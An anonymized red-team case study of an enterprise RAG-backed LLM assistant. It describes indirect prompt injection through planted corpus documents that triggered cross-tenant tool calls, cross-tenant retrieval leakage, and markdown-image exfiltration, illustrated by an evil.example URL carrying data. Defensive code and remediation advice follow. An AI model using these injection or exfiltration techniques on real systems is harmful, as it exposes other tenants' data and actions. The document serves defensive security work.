Prompt-Injection and Tool-Misuse in a RAG-Backed Internal Assistant

Red-team engagement against a customer-built LLM assistant integrated with internal data sources and tools.

By Gleb Z.

Anonymized at the customer’s request. Specifics of the LLM provider, RAG source corpus, and tool surface are abstracted; engagement structure and finding categories are real.

Engagement at a glance

Sector: SaaS — enterprise productivity, internal-deployment AI assistant.
System under assessment: Customer-built LLM-backed assistant. RAG against an internal document corpus; tool surface included a CRM read API, an internal knowledge wiki edit API, and a sandboxed code-execution path.
Engagement model: Custom Engagement — 6 weeks (split: 2 weeks threat modeling and architecture review, 3 weeks adversarial testing, 1 week reporting and walkthrough).
Methodology stages run: all six stages — including a structured Threat Modeling pass using the OWASP LLM Top 10 plus the customer’s internal trust-boundary documentation.

What the customer asked us to validate

The assistant was about to be promoted from beta (internal-only) to enterprise tenants. The security team wanted to know: given a hostile RAG document or a hostile chat input, could an attacker exfiltrate data outside the requesting tenant’s scope, or trigger a tool action against a different tenant’s resources? The architecture had been designed with these concerns in mind; the question was whether the implementation matched the intent.

Threat model

Two adversary classes were modeled. The first: a current tenant user who wants to abuse the assistant’s tool surface beyond their authorization. The second: an external attacker who can plant a document into a tenant’s RAG corpus and wait for an internal user to query against that corpus. We did not model nation-state or supply-chain compromise of the underlying LLM provider, per scope.

What we found

Three categories of finding worth highlighting at a public level:

Tool-permission scoping bypass via indirect prompt injection. A maliciously crafted document, once ingested into a tenant’s RAG corpus, could induce the assistant to call a tool action with parameters drawn from a different tenant’s session context, in a narrow window. This was the most consequential finding. Exploitation required several specific conditions to coincide; we validated the exploit under lab conditions matching the customer’s production architecture.
Cross-context data leakage in the RAG retrieval layer. A retrieval-rank tie-breaker, under specific embedding-space conditions, surfaced snippets from tenant A’s documents when tenant B asked a sufficiently generic question. This was not a prompt-injection finding per se — it was a retrieval-layer logic bug — but it was discovered as part of the same engagement.
Output-channel leakage via markdown rendering. Assistant responses passed through a markdown renderer that did not consistently strip remote-resource references. Crafted output could induce the renderer to fetch attacker-controlled URLs at display time, leaking session metadata via the Referer header.

We documented each finding with reproduction artifacts, severity ratings using the customer’s internal CVSS-equivalent rubric, and a discussion of why the path existed structurally.

How the customer remediated

The cross-tenant tool action was closed via a strict per-call permission re-derivation pattern at the tool-execution layer — tool actions now derive their authorization context only from the requesting session, not from intermediate state set up by RAG-derived content. This was a meaningful architectural change.
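
The rule can be sketched in a few lines. This is a minimal illustration under our own assumptions, not the customer's implementation: the Session type, the REQUIRED_SCOPE table, the scope strings, and the handler signature are all hypothetical. The point it shows is that the tenant identity reaching the tool comes only from the session, and any tenant identifier proposed by the model or by retrieved content is discarded.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    """Hypothetical authenticated session: the only trusted source of identity."""
    user_id: str
    tenant_id: str
    scopes: frozenset


class ToolAuthorizationError(Exception):
    """Raised when the requesting session may not call the tool."""


# Hypothetical mapping from tool name to the scope it requires.
REQUIRED_SCOPE = {"crm.read": "crm:read", "wiki.edit": "wiki:edit"}


def execute_tool(session: Session, tool: str, params: dict, handlers: dict):
    """Re-derive authorization from the session on every single call."""
    scope = REQUIRED_SCOPE.get(tool)
    if scope is None or scope not in session.scopes:
        raise ToolAuthorizationError(f"{tool} is not permitted for this session")
    # Drop any tenant identifier supplied by the model or by retrieved
    # content; the session's tenant is the only one the handler ever sees.
    safe_params = {k: v for k, v in params.items() if k != "tenant_id"}
    return handlers[tool](tenant_id=session.tenant_id, **safe_params)
```

In this sketch a model-proposed call such as execute_tool(session, "crm.read", {"tenant_id": "tenant-b", "account": "42"}, handlers) still runs against the session's own tenant, because the injected tenant_id never reaches the handler.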

The retrieval layer finding was patched in the embedding-rank logic. The markdown renderer was replaced with a stricter allowlist-based renderer.
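
The details of the rank-logic patch are abstracted here, so the following is not the customer's fix. It is a sketch of one common defense-in-depth pattern for this bug class, assuming a hypothetical Chunk record that carries its tenant: filter candidates to the requesting tenant before any ranking or tie-breaking runs, so that no ordering rule can surface another tenant's snippet.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Chunk:
    """Hypothetical retrieval candidate with its owning tenant attached."""
    doc_id: str
    tenant_id: str
    score: float
    text: str


def rank_for_tenant(candidates, tenant_id, k=3):
    """Return the top-k chunks, considering only the requesting tenant's data."""
    # Scope first: ties are then resolved among same-tenant chunks only.
    scoped = [c for c in candidates if c.tenant_id == tenant_id]
    # Highest score first; break ties deterministically by doc_id.
    scoped.sort(key=lambda c: (-c.score, c.doc_id))
    return scoped[:k]
```

Applying the tenant filter as a hard precondition, rather than as one term in the ranking, means an equal-score tie can change which of the tenant's own chunks is returned but never whose chunk it is.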

All three findings passed remediation re-check within 30 days.

What this engagement illustrates

LLM-integrated systems with tool surfaces are not a single attack-surface category. They span at least three: the prompt-input layer, the retrieval layer, and the output-rendering layer. Engagements that treat them as one category miss findings at the boundaries between them. The cross-tenant tool action above was a boundary finding — it required the RAG retrieval layer and the tool-execution layer to be reasoning about authorization differently, and neither team had noticed the discrepancy.

This is a representative shape for AI & ML System Security engagements, particularly against AI/ML Product Companies shipping LLM features to enterprise tenants.

Why this finding existed structurally

The cross-tenant tool-action finding existed because two engineering teams were reasoning about authorization differently and neither team had noticed the discrepancy. The RAG retrieval team reasoned about authorization at the document level — each tenant’s documents were correctly scoped, and retrieval correctly filtered by tenant identity. The tool-execution team reasoned about authorization at the session level — each session correctly carried tenant identity, and tool invocations correctly authorized against that identity. Both teams were correct within their layer’s frame.

The boundary case was the tool invocation that took its parameters from RAG-retrieved content. The tool-execution layer authorized the invocation against the requesting session’s tenant identity; the parameters being passed, however, were derived from content authored under a different tenant identity. Neither team had a frame in which “authorization of a tool call” included “authorization of the parameters passed to the tool call.”
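
One way to give "authorization of the parameters" a concrete form is to carry provenance alongside every value that originates in retrieved content. The sketch below is illustrative only and assumes a hypothetical Tainted wrapper that the retrieval layer would attach; it is not a description of the customer's code.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Tainted:
    """Hypothetical wrapper: a value plus the tenant whose content produced it."""
    value: str
    source_tenant: str


class ParameterProvenanceError(Exception):
    """Raised when a parameter originates from another tenant's content."""


def authorize_params(session_tenant: str, params: dict) -> dict:
    """Unwrap parameters, rejecting any that came from a different tenant."""
    clean = {}
    for name, param in params.items():
        if isinstance(param, Tainted):
            if param.source_tenant != session_tenant:
                raise ParameterProvenanceError(
                    f"parameter {name!r} came from tenant {param.source_tenant!r}"
                )
            clean[name] = param.value
        else:
            # Plain values are assumed to come from the session itself.
            clean[name] = param
    return clean
```

With a check of this kind in front of tool execution, the invocation is authorized twice: once for who is calling, and once for where each argument came from.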

This is a representative shape for security findings in LLM-integrated systems: the finding is not a bug in any single layer but a gap in the trust model that spans layers. Single-layer testing rarely surfaces it. Coordinated testing that explicitly looks at the boundaries between layers does surface it, but boundary testing is rarely scoped because no single layer team feels responsible for it.

How to avoid this class of finding

For teams building LLM-integrated systems with tool surfaces, we recommend the following defensive posture:

Make trust-boundary documentation explicit at the system level. Document not just “what authorization applies to each operation” but also “where does the authorized parameter set come from, and what trust level does it carry.” Discrepancies surface during documentation work, before they surface during exploitation.
Adopt per-call permission re-derivation as the default for tool invocations. Tool execution should derive its authorization context from the requesting session, not from intermediate state set up by RAG-derived content or by upstream tool outputs. This is the architectural fix the customer chose, and it generalizes to most LLM-integrated tool surfaces.
Treat the retrieval layer as an attack surface. Documents in the RAG corpus can be authored by any party with corpus-ingestion access, including parties whose interests do not align with the tenant whose query triggered the retrieval. Indirect injection through retrieval is a category of attack that pure input sanitization at the user-input layer cannot address.
Treat output rendering as an attack surface. Markdown renderers, HTML renderers, and similar output-processing components can be induced to fetch resources or execute output-side actions. The renderer should treat model output as untrusted content even when the model itself is trusted.
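
As an illustration of the last point, the sketch below removes inline markdown images whose host is not on an allowlist before the text reaches a renderer. The allowlisted host is hypothetical, and the regular expression covers only inline image syntax. Reference-style images and raw HTML are not handled, so a production control belongs inside the renderer, operating on the parsed document rather than on raw text.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the UI may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.internal"}

# Inline markdown image: ![alt](url "optional title")
_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_remote_images(markdown: str) -> str:
    """Replace non-allowlisted inline images with their alt text."""

    def replace(match):
        alt, url = match.group(1), match.group(2)
        try:
            parsed = urlparse(url)
        except ValueError:
            return alt  # malformed URL: treat as untrusted
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return alt

    return _IMAGE.sub(replace, markdown)
```

For example, model output containing ![x](https://evil.example/p.png?d=secret) is reduced to the plain text x, so no request carrying session metadata leaves the browser.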

Defensive guidance for adjacent architectures

The boundary-pattern finding generalizes beyond this engagement’s architecture. The shape recurs because LLM-integrated systems introduce intermediate processing layers that carry untrusted content but appear trusted to downstream consumers — and the architectural fix is to make that trust gradient explicit. Agentic systems with multi-step tool chains are vulnerable at the gap between planning and execution; authorization checks should re-derive from session state at execution time rather than being cached from planning time. Multi-tenant fine-tuning and retrieval-augmented training pipelines have the same pattern between document ingestion and inference, and benefit from end-to-end provenance tracking. LLM-mediated workflow automation in regulated industries inherits the pattern at the gap between machine-suggested and human-approved actions; the human reviewer should evaluate against the same authorization context the automated path would have used.
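
For the agentic case, the planning-versus-execution gap can be sketched as a time-of-check versus time-of-use problem. The names below (SessionStore, PlannedStep, run_plan) are hypothetical. The sketch shows only that each step consults live session state when it runs, instead of reusing a decision made when the plan was built.

```python
from dataclasses import dataclass, field


@dataclass
class SessionStore:
    """Hypothetical live store of scopes; it may change while a plan is running."""
    scopes: dict = field(default_factory=dict)

    def current_scopes(self, session_id):
        return self.scopes.get(session_id, frozenset())


@dataclass(frozen=True)
class PlannedStep:
    tool: str
    required_scope: str


def run_plan(store, session_id, plan, handlers):
    """Execute a plan, re-checking authorization immediately before each step."""
    results = []
    for step in plan:
        # Checked at execution time, per step, not once at planning time.
        if step.required_scope not in store.current_scopes(session_id):
            results.append((step.tool, "denied"))
            continue
        results.append((step.tool, handlers[step.tool]()))
    return results
```

If a scope is revoked after the plan is produced but before a later step runs, that step is denied even though the plan was valid when it was built.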

The finding category is documented systematically in our Five-Boundary Attack-Surface Taxonomy — specifically Scenario A (Retrieval → Output leakage) and the boundary-pattern findings between tool-integration and persistence boundaries. The defense posture appropriate to this engagement’s deployment shape (enterprise LLM with moderate tool authority) is described in the Five-Family Posture Matrix under Section 2.2.

Frequently asked questions

Why publish this case study if findings are anonymized?

The structural shape of the finding — boundary-pattern between RAG retrieval layer and tool-execution layer — recurs across enterprise LLM deployments. Other teams shipping similar architectures benefit from the architectural pattern even without the specific customer details. The anonymization protects the customer; the publication protects everyone else shipping a similar system.

Could a smaller team have caught this finding internally?

In principle yes, but the gap sat in the seam between two engineering teams (the RAG retrieval team and the tool-execution team), and neither team’s local review surfaced it. The remediation pattern that worked (per-call permission re-derivation from session state) is a single architectural rule; the hard part is recognizing that the rule is needed. An external assessment supplied the cross-team view that neither internal team was positioned to construct.

Does the engagement model — Custom Engagement at 6 weeks — generalize to other LLM assessments?

The 6-week duration is typical for an LLM-integrated assistant with moderate complexity: 2 weeks of threat modeling and architecture review, 3 weeks of adversarial testing, 1 week of reporting. Simpler architectures (a chat interface with no tool surface) compress to 3-4 weeks. Agentic systems with multi-step tool chains and persistent state expand to 8-12 weeks. The structure of the methodology stages stays constant; only depth and scope at each stage scale.

Why is the cross-tenant tool action ranked as more consequential than the cross-context data leakage?

Both are serious, but the cross-tenant tool action represents an active capability: an attacker can induce the system to perform actions in a different tenant’s authorization context. The cross-context data leakage is a passive disclosure: a generic question may surface another tenant’s content. The active-vs-passive distinction matters for blast radius. Tool actions can write, modify, and trigger downstream effects; passive disclosure exposes content that already exists but changes nothing.

How long should the remediation re-check window be for an LLM-system engagement?

We schedule the re-check 30-60 days after engagement close depending on the finding category. Architectural fixes (like per-call permission re-derivation) usually need 30-45 days to land cleanly and be observable in production traffic. Library swaps (like replacing a markdown renderer) usually resolve faster. The 60-day window in our standard methodology is the upper bound; this engagement closed cleanly at 30 days because all three findings were addressable with bounded code changes rather than redesign work.

Service line: AI & ML System Security
Industry: AI/ML Product Companies and Enterprise AI Deployments
Companion research: Five-Boundary Attack-Surface Taxonomy for LLM Applications · Prompt-Injection Defense Architecture — The Five-Family Posture Matrix
Glossary: Prompt Injection · OWASP LLM Top 10
FAQ: LLM red teaming vs prompt injection — what’s the difference?